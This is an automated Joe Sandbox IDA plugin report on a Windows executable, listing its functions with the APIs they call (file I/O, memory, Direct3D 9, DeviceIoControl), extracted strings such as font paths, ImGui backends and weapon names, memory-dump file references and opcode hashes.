??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD3845
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3855
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3867
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3877

Part of subcall function 00007FF735DE7C30: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7C90
Part of subcall function 00007FF735DE7C30: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7CB2

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DD38A5
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD38E3
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD38ED

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
String ID:
API String ID: 764698701-0
Opcode ID: 084ce96f1bf528e2a3376c7f43c8d4a376ff7156af5c2bff50f80521cd475cfb
Instruction ID: 5608ce5888bc9a85cd03def6a796f6a2ba99d255a7b441fe2f8f9f34757dc85b
Opcode Fuzzy Hash: 084ce96f1bf528e2a3376c7f43c8d4a376ff7156af5c2bff50f80521cd475cfb
Instruction Fuzzy Hash: 71E1D720A3DA87A2EE48EB21F894479B761FF81F46FC45431E44E06668DE3CE54DE760

Function 00007FF735DD3980 Relevance: 52.7, APIs: 35, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FF735DD39B0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A00
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A12
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A24
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A36
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A48
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A5A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A6C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A7E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A90
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AA2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3AB4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AC6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AD8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AEA
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AFC
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B0E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B20
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B32
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B44
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B56
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B68
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B7A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B8C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF735DD3B9E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF735DD3BB0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BC2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BD4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BE6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BF8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3C0A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3C1C

Part of subcall function 00007FF735DE7C30: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7C90
Part of subcall function 00007FF735DE7C30: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7CB2

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DD3C4A
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD3C81
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD3C8B

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
String ID:
API String ID: 1635463032-0
Opcode ID: 1e5164825a538ee13ca689eab3d7c6edcf74a7573b2029405d4bf4d179095a8e
Instruction ID: 55bcbbb0c143ef77d94d7498a10e6f2e01c070f4f08c6daedf25d0b29fb4f281
Opcode Fuzzy Hash: 1e5164825a538ee13ca689eab3d7c6edcf74a7573b2029405d4bf4d179095a8e
Instruction Fuzzy Hash: 6691DA61A3DA4BA2EF44EB14E8945A9B321FF80F4AFC05032E54E46978DF2DDA49D710

Function 00007FF735DB3B00 Relevance: 29.0, APIs: 23, Instructions: 240COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3B2B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3B50
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3B75
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3B9A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3BBF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3BF1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3C16
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3C3B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3C6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3C92
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3CC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3CE9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3D0E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3D8A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3DAF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3DD4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3DF9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3E1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3E43
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3E68
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3E8D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3EB2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3ED7

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c5ba173f833f5b9a869d8b74cc6861b0191b3cc17a7c7d1a4161cda319e8907c
Instruction ID: 5e465c655c35ac71cefcee9ad9ace6e8bdc16c66ef6da17dae6a030fafd85d9d
Opcode Fuzzy Hash: c5ba173f833f5b9a869d8b74cc6861b0191b3cc17a7c7d1a4161cda319e8907c
Instruction Fuzzy Hash: 5CB14931A2B683B1FF8AAF51D4906B8A3A0EF45F45F885436C90D877A1DF2DA541B730

Function 00007FF735DBF050 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DA2650: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA2731

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF0B6
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF0C7
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF0E1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBF107
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF127
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF135
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBF150
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF17D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DBF323

Strings

C:\Windows\Fonts\Impact.ttf, xrefs: 00007FF735DBF085
%s, %.0fpx, xrefs: 00007FF735DBF26C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: fclose$fseekmalloc$freadfreeftell
String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
API String ID: 3453272378-2114150515
Opcode ID: 39950559af9aea2db03513b28cbd6c1e210d312cab9208b347ef7cf209f7ff31
Instruction ID: 129b3a0be3fff661770c5ac3e184a593e366df9de7c209511d12e5ac20e6ddbf
Opcode Fuzzy Hash: 39950559af9aea2db03513b28cbd6c1e210d312cab9208b347ef7cf209f7ff31
Instruction Fuzzy Hash: 2691D521918BC6A5F7169F6DE8412F9B3B0FF98B49F446230EE8916724EF39D146CB10

Function 00007FF735DDACA0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

Direct3DCreate9Ex.D3D9 ref: 00007FF735DDACBD
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDACCC
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDADA6
QueryPerformanceFrequency.KERNEL32 ref: 00007FF735DDAE01
QueryPerformanceCounter.KERNEL32 ref: 00007FF735DDAE16
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DDAFBC

Strings

imgui_impl_win32, xrefs: 00007FF735DDAE2B
@, xrefs: 00007FF735DDAD82
imgui_impl_dx9, xrefs: 00007FF735DDAF0A
OTTO, xrefs: 00007FF735DDB0BE, 00007FF735DDB0E9

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
API String ID: 2444153533-2332507762
Opcode ID: 5445eb45c4c382c2b7768161d1c49320f811e22e27bde1671fe4c3e8339ada38
Instruction ID: b4145dc81077f10d56c850a6ed8defc301ece198742db4280450379e9b6f9052
Opcode Fuzzy Hash: 5445eb45c4c382c2b7768161d1c49320f811e22e27bde1671fe4c3e8339ada38
Instruction Fuzzy Hash: D8D15B72A49B82A6E311AF25E9443A9B7B4FF44B48F804135DB8C0B764DF7EE164DB10

Function 00007FF735DDB180 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DD27C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD28B1

memchr.VCRUNTIME140 ref: 00007FF735DDB225
memchr.VCRUNTIME140 ref: 00007FF735DDB253
memchr.VCRUNTIME140 ref: 00007FF735DDB283
memchr.VCRUNTIME140 ref: 00007FF735DDB2B4
memchr.VCRUNTIME140 ref: 00007FF735DDB2E8
memchr.VCRUNTIME140 ref: 00007FF735DDB314
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDB390

Strings

Rifl, xrefs: 00007FF735DDB290
Shotgun, xrefs: 00007FF735DDB1C9
Snip, xrefs: 00007FF735DDB2F2

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memchr$_invalid_parameter_noinfo_noreturn
String ID: Rifl$Shotgun$Snip
API String ID: 876120417-932107277
Opcode ID: 0639a9f2ec585014b3873c095b304635025d16159d33fafefcbad199ef3611de
Instruction ID: 279e422c30c2dff818fb773acf6e1a5669691db5d41f25794752e33e23a70d62
Opcode Fuzzy Hash: 0639a9f2ec585014b3873c095b304635025d16159d33fafefcbad199ef3611de
Instruction Fuzzy Hash: 9551C623A28643A5FA14AF21D4802B9A7E0EF44FA4FD44231DA6D03BD5DF7CE545BB20

Function 00007FF735DD27C0 Relevance: 13.8, APIs: 9, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8

Part of subcall function 00007FF735DE8040: DeviceIoControl.KERNEL32 ref: 00007FF735DE80F9

DeviceIoControl.KERNEL32 ref: 00007FF735DD2963

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD28B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2ACC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2B0D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2B5E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2B9E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2BFA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2C77
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2CC3

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememmove
String ID:
API String ID: 4207174869-0
Opcode ID: a206f17d0baf4eeb31e64d865681b70d3b03a713257a3b94ac86b94143e747e1
Instruction ID: f69a3267301b6d3e7f98e53c22c569d875678637094d26acc38a6e36782a7218
Opcode Fuzzy Hash: a206f17d0baf4eeb31e64d865681b70d3b03a713257a3b94ac86b94143e747e1
Instruction Fuzzy Hash: 9DE1E263F24A47A5FB04EB68D4803AD67A1EF45BA4F805231EA6C17BD9DF78D480E350

Function 00007FF735DBEC70 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBECA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBED5C
memmove.VCRUNTIME140 ref: 00007FF735DBED7C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBED9C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEE6A
memmove.VCRUNTIME140 ref: 00007FF735DBEE81
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEEA8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEEC9

Strings

?, xrefs: 00007FF735DBECEA

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: freemalloc$memmove
String ID: ?
API String ID: 3069178222-1684325040
Opcode ID: 2163ba520d9052c8bba6a218e0553cb800c4eb239031deab9f51477c17a23248
Instruction ID: aee471fca2bd838c4256d7f5b5e41ba220a7af6d88b935fb4204ed7ac33d1d58
Opcode Fuzzy Hash: 2163ba520d9052c8bba6a218e0553cb800c4eb239031deab9f51477c17a23248
Instruction Fuzzy Hash: 5C71BD32A19B82A6EB59DF25D590278B3A4FB48F44F889239CF8D47351EF38E491D310

Function 00007FF735DA2840 Relevance: 13.6, APIs: 9, Instructions: 76COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA288D
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA289E
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA28B8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA28DA
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA28F6
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA2904
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA291F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA2927
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DA293D

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: fclose$fseek$freadfreeftellmalloc
String ID:
API String ID: 3246642831-0
Opcode ID: c037d8738ead99cedb1b90ae9736a27c5b295fbf60cae6eeaefc6a729d5c03a7
Instruction ID: 2a1c2159f58717a34f780db23ac0fb832a13b7a7be007662a2ca478f8ff935a3
Opcode Fuzzy Hash: c037d8738ead99cedb1b90ae9736a27c5b295fbf60cae6eeaefc6a729d5c03a7
Instruction Fuzzy Hash: AB318121B29B43A1FB59BB17A88437AA2A0EF48F80FCC1034DD4E07794DE3CE5526320

Function 00007FF735DBBA00 Relevance: 11.4, APIs: 9, Instructions: 130COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA31
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA5A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA83
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBAB8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBAE1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBB10
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBBB94
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBBBC7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBBC1C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
